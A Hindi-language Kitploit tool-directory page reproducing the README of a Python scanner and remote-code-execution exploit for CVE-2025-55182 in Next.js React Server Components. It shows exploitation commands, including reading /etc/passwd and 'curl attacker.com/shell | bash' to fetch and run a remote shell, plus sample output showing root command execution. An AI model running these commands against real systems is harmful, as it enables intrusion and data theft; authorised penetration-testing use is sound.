Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — Next.js अनुप्रयोगों में **React Server Components (RSC)** कमज़ोरियों का पता लगाने और उनका शोषण करने हेतु Python-आधारित सुरक्षा स्कैनर। यह उपकरण निष्क्रिय पहचान, सक्रिय फ़िंगरप्रिंटिंग और RCE शोषण परीक्षण करता है। | Kitploit
उपकरण/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Next.js अनुप्रयोगों में **React Server Components (RSC)** कमज़ोरियों का पता लगाने और उनका शोषण करने हेतु Python-आधारित सुरक्षा स्कैनर। यह उपकरण निष्क्रिय पहचान, सक्रिय फ़िंगरप्रिंटिंग और RCE शोषण परीक्षण करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

RSC डिटेक्टर - React Server Components भेद्यता स्कैनर

Next.js अनुप्रयोगों में React Server Components (RSC) भेद्यताओं का पता लगाने और उनका शोषण करने के लिए एक Python-आधारित सुरक्षा स्कैनर। यह उपकरण निष्क्रिय पहचान, सक्रिय फिंगरप्रिंटिंग और RCE शोषण परीक्षण करता है।

⚠️ चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है। परीक्षण से पहले हमेशा लिखित अनुमति प्राप्त करें।


विशेषताएँ

✅ निष्क्रिय पहचान - RSC संकेतकों के लिए HTML, हेडर और पृष्ठ संरचना का विश्लेषण करता है
✅ सक्रिय फिंगरप्रिंटिंग - सर्वर प्रतिक्रियाओं का पता लगाने के लिए RSC-विशिष्ट हेडर भेजता है
✅ HTTP हेडर विश्लेषण - Next.js और RSC-संबंधित हेडर की पहचान करता है
✅ RCE शोषण - कमजोर सर्वरों पर कमांड निष्पादित करता है (यदि शोषण योग्य हो)
✅ रंगीन टर्मिनल आउटपुट - बेहतर पठनीयता के लिए उन्नत दृश्य प्रतिक्रिया
✅ इंटरैक्टिव मोड - शोषण मोड में कई कमांड निष्पादित करें
✅ मजबूत डिकोडिंग - gzip-संपीड़ित और बाइनरी पेलोड को संभालता है


स्थापना

आवश्यक शर्तें

  • Python 3.8+
  • pip (Python पैकेज प्रबंधक)

सेटअप

  1. रिपॉजिटरी क्लोन करें

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. निर्भरताएँ स्थापित करें

    root@kitploit:~
    pip install -r requirements.txt
    

    आवश्यक पैकेज:

    • requests>=2.28.0 - HTTP क्लाइंट लाइब्रेरी
    • urllib3>=1.26.0 - उन्नत HTTP उपयोगिताएँ
    • colorama>=0.4.6 - टर्मिनल रंग (Windows संगत)
    • beautifulsoup4 - HTML पार्सिंग

उपयोग

बुनियादी पहचान (बिना शोषण)

root@kitploit:~
python rsc_detector.py https://example.com

शोषण के साथ पूर्ण स्कैन

root@kitploit:~
python rsc_detector.py https://example.com --exploit

विशिष्ट कमांड निष्पादित करें

root@kitploit:~
python rsc_detector.py https://example.com --exploit --cmd "whoami"

इंटरैक्टिव शोषण मोड

root@kitploit:~
python rsc_detector.py https://example.com --exploit

फिर प्रॉम्प्ट पर कमांड दर्ज करें (बाहर निकलने के लिए quit टाइप करें)।


कमांड लाइन विकल्प

विकल्पविवरण
<URL>लक्ष्य URL (आवश्यक)। अनुपस्थित होने पर स्वतः https:// जोड़ता है
--exploitपहचान के बाद RCE शोषण सक्षम करें

उदाहरण

RSC भेद्यता का पता लगाएं:

root@kitploit:~
python rsc_detector.py https://target.com

शोषण करें और id कमांड चलाएं:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "id"

शोषण करें और cat /etc/passwd चलाएं:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

इंटरैक्टिव मोड (एकाधिक कमांड):

root@kitploit:~
python rsc_detector.py https://target.com --exploit

यह कैसे काम करता है

1. निष्क्रिय स्कैन

  • window.__next_f मार्कर की जाँच करता है (Next.js App Router)
  • text/x-component Content-Type का पता लगाता है
  • React Flight Protocol मार्करों की खोज करता है
  • __NEXT_DATA__ और Next.js इम्पोर्ट्स का विश्लेषण करता है

2. हेडर विश्लेषण

  • Server, Vary, और X-Nextjs-Cache हेडर की जाँच करता है
  • HTTP हेडर में RSC जागरूकता की पहचान करता है

3. सक्रिय फिंगरप्रिंटिंग

  • RSC: 1 हेडर के साथ अनुरोध भेजता है
  • RSC-विशिष्ट हेडर के प्रति सर्वर प्रतिक्रिया का विश्लेषण करता है
  • React Flight Protocol संरचना का पता लगाता है

4. RCE शोषण

  • React Server Component क्रमांकन का शोषण करते हुए दुर्भावनापूर्ण JSON पेलोड तैयार करता है
  • सर्वर-साइड कोड निष्पादन ट्रिगर करने के लिए multipart form-data भेजता है
  • base64-एन्कोडेड कमांड आउटपुट को डिकोड करता है
  • gzip-संपीड़ित प्रतिक्रियाओं का समर्थन करता है

आउटपुट और परिणाम

पहचान परिणाम

root@kitploit:~
[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

शोषण आउटपुट

root@kitploit:~
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

भेद्यता विवरण

CVE-2025-55182 शोषण:

  • React Server Component (RSC) क्रमांकन दोष
  • Next.js Server Action डिसीरियलाइज़ेशन भेद्यताएँ
  • दुर्भावनापूर्ण पेलोड के माध्यम से ऑब्जेक्ट प्रोटोटाइप प्रदूषण
  • child_process.execSync() के माध्यम से कमांड इंजेक्शन

आक्रमण सतह

  • App Router का उपयोग करने वाले Next.js अनुप्रयोग
  • उपयोगकर्ता-नियंत्रित इनपुट वाले Server Components
  • RSC सक्षम लेकिन ठीक से मान्य न किए गए अनुप्रयोग

कानूनी और नैतिक दिशानिर्देश

⚠️ महत्वपूर्ण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए सख्ती से है:

  1. ✅ करें: उन प्रणालियों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की लिखित अनुमति है
  2. ✅ करें: विक्रेता को जिम्मेदारी से भेद्यताओं की रिपोर्ट करें
  3. ✅ करें: जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  4. ❌ न करें: बिना प्राधिकरण के प्रणालियों के विरुद्ध उपयोग न करें
  5. ❌ न करें: दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें
  6. ❌ न करें: संवेदनशील डेटा संग्रहीत या निष्पादित न करें

अनधिकृत कंप्यूटर पहुँच अवैध है इनके अंतर्गत:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act 1990 - UK
  • अधिकांश देशों में समान कानून

जिम्मेदार प्रकटीकरण

यदि आप इस उपकरण का उपयोग करके कोई भेद्यता खोजते हैं:

  1. न करें: जब तक विक्रेता पैच नहीं कर देता, सार्वजनिक रूप से प्रकट न करें
  2. संपर्क करें: विक्रेता की सुरक्षा टीम से सीधे संपर्क करें
  3. दें: पैच विकास के लिए 90 दिन का समय दें
  4. समन्वय करें: प्रकटीकरण के समय के बारे में विक्रेता के साथ समन्वय करें
  5. श्रेय लें: प्रकटीकरण के बाद सलाहकारों में स्वयं को श्रेय दें

समस्या निवारण

SSL प्रमाणपत्र त्रुटियाँ

उपकरण डिफ़ॉल्ट रूप से SSL सत्यापन को अनदेखा करता है। सत्यापन सक्षम करने के लिए:

root@kitploit:~
detector = RSCDetector(url, verify_ssl=True)

Base64 डिकोडिंग त्रुटियाँ

उपकरण स्वचालित रूप से:

  • विकृत base64 स्ट्रिंग्स में पैडिंग जोड़ता है
  • gzip पेलोड का पता लगाता है और डिकंप्रेस करता है
  • बाइनरी डेटा के लिए UTF-8 प्रतिस्थापन वर्णों का सहारा लेता है

प्रतिक्रिया में "digest" कुंजी नहीं है

  • लक्ष्य कमजोर नहीं हो सकता है
  • सर्वर शोषण पेलोड को फ़िल्टर कर सकता है
  • मैन्युअल परीक्षण या विभिन्न एंडपॉइंट आज़माएं

टाइमआउट समस्याएँ

कोड में टाइमआउट बढ़ाएं:

root@kitploit:~
response = self.session.get(self.url, timeout=30)  # 30 seconds

प्रोजेक्ट संरचना

root@kitploit:~
CVE-2025-55182/
├── README.md                # This file
├── requirements.txt         # Python dependencies
├── rsc_detector.py         # Main scanner & exploit engine
├── rsc_cli.py              # CLI utilities (if present)
├── script.py               # Additional scripts (if present)
├── COLOR_GUIDE.md          # Color output documentation
└── .gitignore              # Git ignore rules

निर्भरताएँ

root@kitploit:~
requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)

सभी एक साथ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

प्रदर्शन युक्तियाँ

  • पहचान तेज़ करें: केवल स्कैनिंग कर रहे हैं तो --exploit फ्लैग छोड़ें
  • बैच परीक्षण: कई URL स्कैन करने के लिए एक स्क्रिप्ट बनाएं
  • नेटवर्क टाइमआउट: धीमे नेटवर्क के लिए टाइमआउट मान समायोजित करें
  • SSL बायपास: लचीलेपन के लिए सत्यापन डिफ़ॉल्ट रूप से अक्षम है

उन्नत उपयोग

कस्टम कमांड निष्पादन

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

आउटपुट पुनर्निर्देशन

root@kitploit:~
python rsc_detector.py https://target.com > scan_results.txt 2>&1

बैच स्कैनिंग

root@kitploit:~
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

सीमाएँ

  • ⚠️ केवल कमजोर Next.js कॉन्फ़िगरेशन पर काम करता है
  • ⚠️ लक्ष्य अनुप्रयोग पर RSC सक्षम होना आवश्यक है
  • ⚠️ कुछ सर्वर शोषण पेलोड को फ़िल्टर या ब्लॉक कर सकते हैं
  • ⚠️ बाइनरी आउटपुट टर्मिनल में सही ढंग से प्रदर्शित नहीं हो सकता है
  • ⚠️ कमांड निष्पादन सर्वर अनुमतियों पर निर्भर करता है

योगदान

कोई बग मिला या सुधार का विचार है? योगदान का स्वागत है!

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं (git checkout -b feature/improvement)
  3. अपने परिवर्तन कमिट करें (git commit -am 'Add feature')
  4. ब्रांच पर पुश करें (git push origin feature/improvement)
  5. एक Pull Request सबमिट करें

अस्वीकरण

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.

लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।


संदर्भ

  • React Server Components दस्तावेज़ीकरण
  • Next.js App Router
  • CVE-2025-55182 (जब उपलब्ध हो)
  • OWASP: इंजेक्शन दोष

संपर्क और सहायता

  • भेद्यताओं की रिपोर्ट करें: जिम्मेदार प्रकटीकरण का उपयोग करें
  • सुरक्षा मुद्दे: सार्वजनिक रूप से पोस्ट न करें; सीधे अनुरक्षकों से संपर्क करें
  • फीचर अनुरोध: GitHub पर एक issue खोलें

लेखक

सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए बनाया गया।

अंतिम अपडेट: 19 दिसंबर, 2025


परिवर्तन लॉग

v1.0.0

  • ✅ निष्क्रिय RSC पहचान
  • ✅ सक्रिय फिंगरप्रिंटिंग
  • ✅ RCE शोषण
  • ✅ रंगीन टर्मिनल आउटपुट
  • ✅ इंटरैक्टिव शोषण मोड
  • ✅ Gzip डीकंप्रेसन समर्थन
  • ✅ मजबूत base64 डिकोडिंग

याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। इस उपकरण का उपयोग नैतिक और कानूनी रूप से करें।

टूल डाउनलोड करें
--cmd <command>एक विशिष्ट कमांड निष्पादित करें (--exploit के साथ उपयोग करें)